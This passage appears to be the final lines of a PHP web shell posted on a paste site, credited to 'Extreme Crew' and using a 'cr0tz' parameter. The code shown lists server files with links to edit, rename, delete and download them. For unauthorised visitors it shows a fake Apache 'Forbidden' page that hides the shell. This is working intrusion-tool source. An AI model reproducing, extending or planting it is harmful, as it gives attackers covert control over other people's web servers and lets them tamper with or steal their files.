  2155. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2156. echo "<td class='td_home' style='padding-left: 15px;'><a href='?cr0tz&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?cr0tz&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?cr0tz&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?cr0tz&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
  2157. echo "</tr>";
  2158. }
  2159. echo "</table>";
  2160. if(!is_readable($dir)) {
  2161. //
  2162. } else {
  2163. echo "<hr>";
  2164. }
  2165. echo "<center>Copyright &copy; ".date("Y")." - <a href='?cr0tz&folder=$dir&do=tentang'>Extreme Crew</a></center>";
  2166. }
  2167. echo "</html>";
  2168. }
  2169. else
  2170. {
  2171. echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
  2172. <address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
  2173. return false;
  2174. }
  2175. ?>
Add Comment
Please, Sign In to add comment